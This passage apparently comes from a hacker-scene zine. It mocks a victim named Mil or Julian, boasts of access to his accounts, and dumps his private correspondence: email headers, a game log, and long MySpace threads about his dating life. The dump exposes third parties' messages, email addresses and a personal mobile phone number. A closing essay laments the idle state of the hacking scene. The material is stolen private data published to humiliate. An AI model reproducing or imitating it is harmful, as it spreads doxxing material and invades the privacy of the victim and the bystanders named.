begin with. A lot of it is in good fun. Isn't that outrageous? Of all
people, some idiot who has been oblivious to our access to multiple
accounts for over a year is the one telling us that our time is up! Mil
told us that "redemption is coming". Well Mil, that has been a
self-fulfilling prophecy, except it is not happening the way you thought.
By the way, Mil never said that HE would even attempt to attack us. It
would be his big hacker buddies that would do so. See how this has turned
out so far, Julian? No matter how elite your hacker buddies may be, they
will not stop you from being a moron and getting yourself owned.
Instead, Mil has new lessons to learn. He has finally mastered "do not use
'lightning' as a password", we think, but we feel that we can teach him
more advanced lessons like "do not reuse passwords" and "be careful who
you accept links from, especially when you are slow on the updating front".
Mil, stay away from hackers. If you could have done so without _doing_
anything or saying anything, you would have been OK. But you just cannot
stop from tempting us (and probably others who are a bit more silent) from
owning you. Just, stay away. Stop pretending to be anything more talented
than a mediocre end user.
Julian, it is our diagnosis that you are insecure. Do not be dismayed;
together we can have a brainstorming session and potentially reach closure
on some of your issues. Let's talk about your feelings. Then we can
reassess our options bilaterally. But really, until you stop being such a
fucking tool, just don't bring yourself to our attention.
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[cuntrash.txt]
X-Gmail-Received: d5716904788974f52b2dbf15f292010f97d5b544
Received: by 10.38.165.4 with HTTP; Tue, 18 Jan 2005 09:22:32 -0800 (PST)
Message-ID: <d78f140705011809223610f1c9@mail.gmail.com>
Date: Wed, 19 Jan 2005 04:22:32 +1100
From: "Milamber ..." <milamber.1@gmail.com>
Reply-To: "Milamber ..." <milamber.1@gmail.com>
To: kurupt3k@coder-underground.com
Subject: wh0re
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Delivered-To: milamber.1@gmail.com
Cunt rash
[/cuntrash.txt]
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[derision.txt]
X-Gmail-Received: 19db689c2b1fcf29953798936b7d1b2b22c2f69e
Received: by 10.35.130.7 with HTTP; Sat, 8 Apr 2006 23:32:27 -0700 (PDT)
Message-ID: <d78f14070604082332x5aebc1b0u896c5bad15a09267@mail.gmail.com>
Date: Sun, 9 Apr 2006 16:32:27 +1000
From: "Milamber ..." <milamber.1@gmail.com>
To: arwynies@gmail.com
Subject: Derision
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Delivered-To: milamber.1@gmail.com
You prepare to shout "h0n0ez!!11!!one" upon joining combat.
You prepare to attack Derision who is already hunting Silent Turkan of the
=
GWA.
> You shout: h0n0ez!!11!!one
tan
Derision is rocked by the bloodcurdling warcry.
Hp: 1833 (1833) Gp: 203 (298) Xp: 19806
Your attitude is now neutral.
>
stab derision
Hp: 1833 (1833) Gp: 206 (298) Xp: 19809
A dull red glow appears around Derision.
You prepare to stab Derision with one of your short swords.
> Hp: 1833 (1833) Gp: 174 (298) Xp: 19995
[Ninjas] Turkan: i need a fucking heal :P
g e
Holy Serakyo The Mystik appears to be checking out all your wounds.
Holy Serakyo The Mystik studies Derision, Holy Serakyo The Mystik,
Decora D'Omega, Takeshi, a boring troll and you.
Queued command: g e
> Hp: 1833 (1833) Gp: 177 (298) Xp: 19998
You start guarding the east exit against everyone.
A strange-looking man goes on about cheese dip before wandering up the
stre=
et.
[Ninjas] Takeshi: rofl
stab derision
Hp: 1833 (1833) Gp: 170 (298) Xp: 20111
You prepare to stab Derision with one of your short swords.
> Hp: 1833 (1833) Gp: 138 (298) Xp: 20276
The dull red glow around Derision becomes wobbling orange.
You launch a powerful attack. You thrust at Derision with one of your
short swords but his magical shielding absorbs all of the blow.
The wobbling orange glow around Derision becomes bright red.
[Ninjas] Turkan reports that he is near death and clear of mind.
Hp: 1833 (1833) Gp: 141 (298) Xp: 20279
The bright red glow around Derision becomes wobbling orange.
Hp: 1833 (1833) Gp: 144 (298) Xp: 20282
The wobbling orange glow around Derision becomes flickering yellow.
You launch a powerful attack. You thrust at Derision with one of your
short swords but his magical shielding absorbs all of the blow.
stab derision
You prepare to stab Derision with one of your short swords.
> Hp: 1833 (1833) Gp: 112 (298) Xp: 20461
Holy Serakyo The Mystik appears to be checking out all your wounds.
stab derision
Holy Serakyo The Mystik studies Derision, Holy Serakyo The Mystik,
Decora D'Omega, Takeshi, a boring troll and you.
You prepare to stab Derision with one of your short swords.
> Derision pierces your stomach with one of his elegant stilettos.
Hp: 1774 (1833) Gp: 80 (298) Xp: 20655
[Ninjas] Takeshi: Derision r die now tbh
Hp: 1777 (1833) Gp: 83 (298) Xp: 20658
You launch a powerful attack. You stab Derision deeply in the neck
with one of your short swords but his magical shielding absorbs most
of the blow.
There is a sudden white flash around Derision.
Silent Turkan of the GWA arrives from the east.
You try to block the exit and stop Derision from leaving east but he
manages to elude you.
Derision leaves east.
|
@-@
|
This is Brother David's house of rest and safety; a warm and pleasant
room with thick walls to block out the sound of the street. The room
has been decorated according to the strict methods of Fung Shooey:
plump pillows are scattered all over the wooden floor-boards, and the
walls have been painted in pale pastels. The overall effect is one of
peace.
There is one obvious exit: west.
Brother David is sitting on a hard wooden stool and Derision, Old Man
Mayian and a sad man are standing here.
A colourful sash, three half rotten pumpkins, an ice bucket, a
business card, an information booklet, a slightly rotten pumpkin and a
knife are on the floor.
You pursue Derision east.
A terrible screeching emanates from Old Man Mayian's jar of screaming
mandrake roots.
Derision grins.
say you suck
You say: you suck
> Derision appears to be checking out all your wounds.
Derision studies Derision, Old Man Mayian, a sad man, Brother David and
you=
.
[Ninjas] Takeshi: lame :9
gs need more block or w/e :P
Derision agrees wholeheartedly.
[Ninjas] Althius: need more block or w/e :P
> You feel very tranquil.
Derision waves.
Derision leaves the game.
[Derision leaves Discworld -- needs no introduction]
[/derision.txt]
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[yumi.txt]
awesome, well im going out 2moro with some girls 2 darling harbour and
probably going for drinks later @ the cross. ur welcome 2 join us.
0405 357 579 > my number.
yea, i cant handle this double msging business..haha
sweet dreams...
p.s grrrrr~ so jealous of u for living in the whitsundays! ur living the
life...thata boy!
----------------- Original Message -----------------
From: Jules
Date: 18 Apr 2007, 09:24 PM
Was living in the whitsundays for awhile at airlie beach ... yes, my
character has certainly changed a lot - and still is changing
It does! let me know if you can think of anything, heh
I've gotta go, got some things I should do before I go to sleep :)
Good to hear from you again!
night xoxoxx
----------------- Original Message -----------------
From: yumi
Date: Apr 18, 2007 11:22 PM
u werent in sydney?! where were u then..
see, u were hiding somewhere :p
i think my character has changed heaps. tho i dont really know what i was
like in primary school. i remember u were pretty quite but a nice guy. i
couldnt handle some of the boys but u were quite tolerable~hehe
ahh, catch up sounds good...
----------------- Original Message -----------------
From: Jules
Date: 18 Apr 2007, 09:12 PM
Heh no, I think you've changed a lot
Haha I've been around ;P
i wish I didn't come back to sydney though! we should catch up sometime
maybe!
----------------- Original Message -----------------
From: yumi
Date: Apr 18, 2007 11:11 PM
hehe, ta~ tho i feel like i look pretty much the same still!
if i ran into u in the streets at all, i would have had no idea. usually i
can see a glimmer of something i recognise in ppl i havent seen in ages.
isnt it bizarre, after 10 yrs we find each other..* where were u hiding
jules? hehe..
----------------- Original Message -----------------
From: Jules
Date: 18 Apr 2007, 09:03 PM
Haha yeh, well I have changed a lot ;P Usually look a lot different than I
do in any of those pictures as well
heh yes, you look a lot different as well - all for the better though ;)
----------------- Original Message -----------------
From: yumi
Date: Apr 18, 2007 11:01 PM
u know, other than ur face shape, u look totally different to how i
remember u last..
*all for the better tho ;)
----------------- Original Message -----------------
From: Jules
Date: 18 Apr 2007, 08:29 PM
hehe :)
haha yeh, myspace is good for that ... That's good! Yeh, I'm really good
as well...Just started a new job fairly recently doing IT stuff for
Zurich! What do you do with yourself?
----------------- Original Message -----------------
From: yumi
Date: Apr 18, 2007 1:09 PM
hahaha! oh WOW!
this is so weird, im finding all these old berowra ppl..
im doing great! how r u? what r u up to?
----------------- Original Message -----------------
From: Jules
Date: 18 Apr 2007, 06:48 AM
Hey hey ...Yes I did! I remember you...How have you been?
----------------- Original Message -----------------
From: Yumi
Date: Apr 17, 2007 1:45 AM
did u go to berowra public?
[/yumi.txt]
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[flirt.txt]
Subject: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: XOX
Body: You better not......because i can be quite dangerous :P
and yes.....really!!! xox
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 11:53 PM
Haha I saw nothing bad about you
haha yeh, she scares me, but there's not much she can do except get her b
rother to attack me or something, lol
oh really?? lol!!
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 11:50 PM
Ohhhh strange hey...well i would hate to hear what you say about me then
:P
ohh poor belinda - poor little love, probably heart broken - watch your
back 16yr olds can be evil...
whips and sexual outfits hey.......well i could tell you about mine if you
like!!.......pft, kidding - obviously haha
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 11:48 PM
Haha yeh I'm helping, but it's less physical work now, nore changing
settings for certain things etc so i can do it from this computer ... Haha
no other girlfriends ;P Only one other person messaging me and they're
strange...haha i fucked belinda off ... Was going to let her down gently,
but it didn't quite happen that way, so I'm pretty sure her love turned to
hate ;P
The big german girl is still as scary as ever, telling me about her whips
and strange sexual outfits ;P
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 11:43 PM
So are you helping at all slacker? or just msging me and all your other
GF's hehehe...by the way, how is Belinda (was that her name) and the big
German girl hahaha
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 11:35 PM
No no no!! haha, I'm honoured by your generous donations, supporting my
long road to sobriety!! I really feel like I should be helping more here!
everyone seems to be a bit more relaxed now though which is
good...everything might even be ready for saturday :o
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 11:32 PM
Well if you want to pass up my offer then that is entirely up to you :P
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 11:26 PM
Haha ok!! I'm afraid I won't be receiving very much money off you =( Only
because 5c per drink isn't very much, of course
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 11:18 PM
Ok well I will give you 5c for every fluid substance no matter what it is
in that you put down and donât feed to your liver :P
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 11:10 PM
Wait ... lol ... I've already lost out on 35 cents =( BUT I won't be
drinking cans when I go to the city =(
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 11:08 PM
really? well you guys are getting ripped off! i will send you 5c for every
can you put down tonight and dont drink :P now keep a tally and you could
be a rich boy by the end of the night
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 11:07 PM
Haha this isn't SA, we don't get money for ours anymore =( erm, not that
my drinking has gotten to that stage yet...erm yes, of course not!
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 11:04 PM
Says he who has to result to collecting cans to feed his alcoholism hahaha
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 11:01 PM
haha will do ;P
haha well the clothes doesn't really worry me that much ...Got too many as
it is :S yeh, the money sucks ... if i wasn't in debt so much and trying
to save it would be justifiable ... but as it is, well ... haha damn me
and always living in the moment and not thinking of the next day
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 10:58 PM
Well you will have to make up for lost time tomorrow and stare long and
hard at my lovely pics :P pft hahaha!
Ohhhhhh you are such a party animal, I wish I had the energy and friends
to party all the timeâ¦not to mention the money and the fricken clothes
to wear out.
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 10:53 PM
haha stop hurting my brain ... It isn't a relief not being able to see you
;P
Yes, at gun point as well, I might add!!! Well maybe not quite, i seemed
to agree it would be a good idea ... but knowing me, ill be out all night
and will be dying tomorrow =..
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 10:50 PM
So it wasn't sarcasm? So its a relief not being able to see me???
heeeeeeeeey!
Ohh your friends are dragging you kicking and screaming into town again? i
think i need to have a talk to them!
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 10:48 PM
Haha oi! Who said it was sarcasm? ;P
a GEEK? What!!@##49
ahh fuck think im getting dragged into town tonight
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 10:41 PM
Ohhhh so sarcastic and mean! Lucky you are a Geek :P
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 10:39 PM
I know, it's such a relief... I mean I'm devastated I can't gaze upon your
beauty as I reply to these sweet messages ... Or something ;)
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 10:37 PM
No pictures? so you cant see me? :P hehe
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 10:32 PM
Shhh ;P
Haha it will work ;P
you can't believe how confusing it is trying to navigate myspace with no
colours or pictures at all lol :S
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 10:30 PM
Normal hey :P ok well I will be off then, I will just tell my boss you
said I could go and if he has a problem with it he can call you
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 10:26 PM
meant full from the bbq ;P but yeh I get bloated off beer as well .... Bbq
was nice, LOTS of food ... and geeks! heh they're not too bad actually,
some are normal/more like me :o
Sure you can! Just walk out ;P
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 10:24 PM
Hahaha! Well beer tends to bloat me too! How was the BBQ? And you did not
answer my questionâ¦..can I please go home early?
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 10:20 PM
Oh I can imagine!!!! Haha yes well that's not fair ... I'm stuck here
setting up a shitload of computers, and forced to view websites through a
text based browser :S
But I've got beer, and sooooo full! =)
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 9:22 PM
Ohh I am so lonely now? It is such a beautiful day todayâ¦although you
would not know because you are not here with me ;) can I pleeeeeease go
home??? :P
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 8:05 PM
haha all right i'll let you off this time ;)
no way!!!!!!!!!!! You'd hurt me if i did ;)
Hah fuck, i better go anyway ... have fun on myspace!! I'm sure it won't
be the same without me!! =( haha, take it easy
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 8:00 PM
Nope? Damn it! I got up this morning tho and went ;) are you saying I am
fatâ¦â¦â¦heeeeeeeeeeeeeeey!
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 7:55 PM
AND i suppose you didn't go to the gym last night? ;P hmmm?
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 7:54 PM
well i am eating crackers and chocolate :P shhhh
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 7:49 PM
Heh just means they're setting things up but running short on time! 10
more minutes and I might go help them =) haha yeh beer + bbq is sounding
good right about now
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 7:46 PM
ha...ok i dont know what that means ;) but as long as you know what you
are doing! Mmmm Beer and BBQ yum
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 7:35 PM
Soon soon! I want to time it so I make it just for the BBQ and beers,
which means less setting up for me =D
hawkes: is the ctf box done
can you tell me what ip addresses you want
ey
im setting up dns
hey
hows it all comming together
hmm another interview.. cutting it a bit fine
Sounds like they're doing well ;P
----------------- Original Message -----------------
From: Cassie
Date: Sep 27, 2006 7:29 PM
Tut tut tutâ¦get to work slacker!
----------------- Original Message -----------------
From: Jules
Date: Sep 27, 2006 7:18 PM
For all the things I'm supposed to be doing today! Still at home :S
-
[/flirt.txt]
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[honour.txt]
Subject: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE:
RE: RE: RE: RE: RE: RE: Wat do you think about me?
Body: well i have been with my BF for 5 yrs this xmas and before that
was with a guy for 2 years then before that i was in a pointless kid
relationship for 3 years...even tho we never really spoke to each other??
very interesting!! so no i haven't ever really been single :P
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 8:21 PM
haha yeh, i thrive on those things!!
Well as long as you're happy....ive been properly single for ages, had a
few brief girlfriends ... Had one long term relationship when i was 16 to
about 18, but that's about it
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 9:57 AM
really! sometimes i feel the
opposite....scared i am gonna look back a
regret missing things? like independance, travelling, buying a house on my
own! own ever really being with 1 person?? i have never been single!! that
scares me sometimes!! although other times i think no its worth it i guess
if i am happy
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 7:41 PM
hehe ;P
I mean no, I'm a big tough man with no feelings!! haha ahhh ... single
life is fun, but gets sort of boring after awhile
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 9:35 AM
well that explains alot...you were hurt before so now you dont want to
make yourself vulnerable again?? hmmmmmm well dont punish the next girl
for what the last one did!! you got thru it last time so you will again if
it happens...but it wont!! :P
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 7:32 PM
haha good idea ;P
Not sure! Just seems to happen a fair bit ... All though it's a reason I
rarely have gf's anymore
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 9:26 AM
well check the yellow pages...i am sure this is a local GF store near you
:P
hahah why would a girl cheat on you?
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 6:30 PM
haha well they're just in between ... i've decided i want a girlfriend
now, but it's just hard to find one ... especially one who won't cheat on
me
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 8:17 AM
maybe the fact that you are trying to pick up wasted 26 yr olds?? hahah
that could be why it is so haaaaaaaaaard!!
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 6:09 PM
I could have, but didn't really feel like it ;P I was so cold to her, and
she was really wasted and just wouldn't leave me alone, so i just did it
I'm not sure :S I tried messaging her on friday, and then again on
saturday, and didn't get any replies ... So she either had no credit, or
just didn't want to talk to me...So I think I'll give up, and try and find
a new love on Thursday ... Why is it so hard to find a decent girl!!?!?!?
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 8:02 AM
oh you just had to settle for her did you? you couldn't go without
altogether? hmmmm wat about your love interest not to long ago? what
happened to that
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 5:59 PM
26...So I had to settle for her friend, who I immensely disliked
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 7:50 AM
hahah!! how old?
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 5:25 PM
haha yeh i know =( I think she was a bit out of my league and age range,
but still !!!!
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 7:14 AM
ohhhhhh wat a tease....flashing around daddys money :P
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 5:10 PM
Oh yes I'm out of control!! haha i got knocked back by a rich girl with a
porsche =( she seemed keen but i a
sked her to come for a walk and she declined! evil women
----------------- Original Message -----------------
From: Cassie
Date: Nov 29 2006 7:02 AM
you are such a rebel jules
----------------- Original Message -----------------
From: Jules
Date: Nov 27 2006 3:12 PM
ha ha yeh ;P
oops, sort of forgot to come home for 5 or so days !! i thought i wasnt
going to do too much this weekend
----------------- Original Message -----------------
From: Cassie
Date: Nov 25 2006 11:21 AM
Interesting :P
----------------- Original Message -----------------
From: Jules
Date: Nov 23 2006 9:21 PM
ADELAIDE
Oops, I mean words can't even begin to describe my thoughts about you.
They just won't do you justice.
*grins*
----------------- Bulletin Message -----------------
From: Cassie
Date: Nov 25 2006 10:56 AM
Describe me in one word.... Just one word. Send it to me and me only. Then
re-post this message to your friends and see how many strange things
people say about you. This is really fun. Just hit the reply key and send
me my one word. Then re-post! Game On!!!! And lets try and keep it
clean... :P
[/honour.txt]
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[stud.txt]
Subject: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE:
RE: RE: RE: RE: Jules the studd :P
Body: Why is she coming over? Up for round two and you have not even
decided on the rules yet? Ohhhhh so you slept with her you naughty boy
Jules!! Hehehe!! Try not sleeping with her while she is with this other
guy, coz then you are the other guy and it makes her look bad â and if
he is hugeâ¦he could find out and want to hurt you :P heheh poor Jules
P.S. you are sooooo in love with her
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 9:42 PM
NO, no love :P
haha always good to keep your bases covered ... She's coming over tonight,
hmmmmmm ... It's going to be hard to be well behaved ... I hate sleeping
with people I like ... Things get messy!!
Damn my confusing head, this is why I avoid letting myself feel anything
for anyone heh
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 9:39 PM
Oh and just a thought â if you declare your dieing love for her and she
turns around and says she doesnât feel the same way about youâ¦.then
say âpft haha kidding, it was a joke â as if I would be in love with
you :(â and cry when she cant see youâ¦â¦keep your bases covered
hahaha
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 9:36 PM
Oh I won't forget! If I fall in love I will come after you and exact my
vengeance :P
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 9:34 PM
Thats my boyâ¦.and donât forget me when you are all giddy and in love!
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 8:35 PM
haha I like the way you think ... Reminds me of me ... All though I'm
trying to be nice or something at the moment ... but yeh fuck it, I'll do
it!!!!
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 8:25 PM
Do you know the other guy? No? then who cares!! Blunt but hey thatâs
life!! And just talk it thru with her first, tell her you arenât
proposing this could be a good short thingâ¦.so if she wants to leave the
guy she is with and give it a go then yippee! If notâ¦.then she
shouldnât have hooked up and did âyou know whatâ on the weekend with
you now should she! :Pe
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 8:23 PM
Haha indeed. .... (by the way, most women are anyway) <<< haha no doubt!!!
Keeps life exciting though ... I'm just trying to get rid of all my
stalkers as it is heh ... Not that I think she would be like that ... Ahh
well, I might pursue it and see what happens I suppose ... I really hate
destroying relationships if I'm actually going to try and go out with the
girl though ;P
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 8:20 PM
Well you cant let past experiences ruin new ones!! I would do it if I was
you!! and whats the worse that can happen â if she turns into a psycho
(by the way, most women are anyway) then get rid of her, change your
number and move interstate :) hahaha
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 8:15 PM
yah that's what she means!! heh she's a good friend ... Well it was just
an example ... guess she doesn't think I'm the type for girlfriends ;P
ahhh such drama ;) haha ... it's just the last girl I decided to go out
with, started like this ... boyfriend thing etc, then it just got messy
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 8:11 PM
Ok so I guess that means she cant believe you want a GF? Yeah? Who is she?
Do you care what she thinks? Or is this the girl you like?
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 8:07 PM
Haha no I'm not a pig ;P
Well not if I may like someone ... haha fuck, this is what I mean ... I
just said to someone I was thinking of getting a girlfriend soon and this
conversation followed :
..x4d..x69..x6c says:
ive decided i might try and get a girlfriend soon lol
..x4d..x69..x6c says:
fucking msn
BaRbI hAs LoSt Da PlOt!!! says:
fuck wait are u sick
BaRbI hAs LoSt Da PlOt!!! says:
i just read that
BaRbI hAs LoSt Da PlOt!!! says:
BaRbI hAs LoSt Da PlOt!!! says:
ahaha
BaRbI hAs LoSt Da PlOt!!! says:
jules
BaRbI hAs LoSt Da PlOt!!! says:
wants
..x4d..x69..x6c says:
Hahah i know
BaRbI hAs LoSt Da PlOt!!! says:
a
..x4d..x69..x6c says:
call me crazy!
BaRbI hAs LoSt Da PlOt!!! says:
girlfirned
BaRbI hAs LoSt Da PlOt!!! says:
BaRbI hAs LoSt Da PlOt!!! says:
wait i need time to take this in
..x4d..x69..x6c says:
shhh
BaRbI hAs LoSt Da PlOt!!! says:
i just got a msg from that guy in melbourne
BaRbI hAs LoSt Da PlOt!!! says:
alright im still not over the shock
BaRbI hAs LoSt Da PlOt!!! says:
ahng on
..x4d..x69..x6c says:
Haha what shock ;P
..x4d..x69..x6c says:
i could have a girlfriend ;P
BaRbI hAs LoSt Da PlOt!!! says:
hahaha so u got one in mind?
..x4d..x69..x6c says:
yep!
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 7:57 PM
well i think if yous like each other and have for a while then yous should
go for it and if something happened over the weekend and then you stop
contacting her then you will look like a pig......and you are not are you
studd boy :P
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 7:55 PM
Yeh, there's sort of been something between us for quite a long time, but
we've never done anything about it ... Yeh not sure if she can be trusted,
but I'd say she can ... Except for what she did on the weekend, but that's
sort of different!!
haha no i don't want to be alone forever ... but I'm still young, and
being single is rather enjoyable..Also breaking up relationships gets
annoying, hence the reason I was thinking I should just stop talking to
her
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 7:49 PM
so you picked her up even tho she had a BF? are yous close friends? or do
you just kind of know her but there is a huge attraction? well dont take
this the wrong way but if she is cheating on her BF with you then she
either A cant be trusted or B is really into you so you should go for it!
Dont like to get in relationships? why? what do you want to be alone for
ever? noone is saying you should get married :P dont hold back scaredy cat
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 7:44 PM
Yeh I picked up one .. but it was just awkward!!
Well one reason is that she's got a boyfriend...another reason is that I
usually avoid relationships, for various reasons ... but if she was single
I probably would have gone for it ... feelings suck :P
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 7:41 PM
So you did pick up or you didnât? well thatâs strange? Why cant you
like her? Go for it stupid!! hahahah
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 7:30 PM
haha I mean well behaved as in NOT picking them up ;P
I even didn't pursue some which would have been really easy lol
So in total there was only one, and it was strange .... I think I might
like her or something ... So I'm not going to talk to her again just in
case I fall for her :P
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 7:27 PM
oh were you now?? you little studd! hahaha how many did we pick up this
weekend
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 7:26 PM
oh that haha ... and it was a friend, and she ended up deciding that she
wanted to head out for some drinks somewhere, and I couldn't be
bothered!!!
AND I was well behaved when it came to women this weekend!
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 7:20 PM
you said you were having a lady 'friend' over to 'watch' a movie?? hmmmmm
----------------- Original Message -----------------
From: Jules
Date: Oct 2, 2006 7:18 PM
haha yes i did! Didn't really do anything on Friday night, had an early
night! by myself :o
What movie???
hah yeh i'd never really played before, was pretty funny
----------------- Original Message -----------------
From: Cassie
Date: Oct 2, 2006 7:15 PM
well it sounds like you had fun too then :) and friday night....heyyyyyy!
you forgot to mention your movie??
ohhhh i lurv yatzee its great!
[/stud.txt]
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[hack.txt]
----------------- Original Message -----------------
From: Jules
Date: Oct 3, 2006 7:54 PM
nOt very well by the looks of it!!! Just someone is trying to brute force
my SSHd ... of course :P lol erm yah! but on the upside, im eating grilled
cheese on toast!
----------------- Original Message -----------------
From: Cassie
Date: Oct 3, 2006 7:37 PM
ok? how do they do that
----------------- Original Message -----------------
From: Jules
Date: Oct 3, 2006 7:33 PM
Haha sucks! is it? Well it was i suppose, afternoon here now!!!
ahhhhhhhhhhhhhhhh someones trying to hack meeeeeeeeeeee bastards ;P
[/hack.txt]
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
EOMIL
);}
sub Scene { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOSCENE'
"Times change and technology progresses. Attackers adept and attacks evolve.
At this point in history, we can wax fondly for the halcyon days when computers
were hacked for pride or ego -- the good ole' simpler times when underground
hacker wars were electronically waged and the collateral damage was the main
website of The New York Times. Or the Solaris machines that were owned and the
high profile computer security icons that had their e-mail spools stolen and
personal poetry publicly posted. Or the OpenBSD machines that were rumored
to be silently owned and the early copies of the most lauded online underground
hacker journal that were distributed months ahead of time. Good times. Nowadays,
there is no underground hacker scene -- not like there used to be (bring back
BoW and Hagis!)." -- Mike Schiffman from the introduction to _Hacker's_Challenge_3_
While route is indeed a whitehat sellout (and appears to like watching his
co-workers be publicly humiliated), he is certainly correct about one thing:
The Scene is IDLE. Not just a little idle, we're talking over a year of idleness
here. Sure, occasionally groups attempt to make a stir. Undoubtedly, some of
the readers will remember the PHC Delka Strike Force, hosted at http://el8.ru/x/
(now down). Or the release of the epic h0no3 about one year ago. And of course,
our own fun little contributions. However, despite the hard work of a number of
individuals, many of the goals originally set forth for pr0j3kt m4yh3m by el8 and
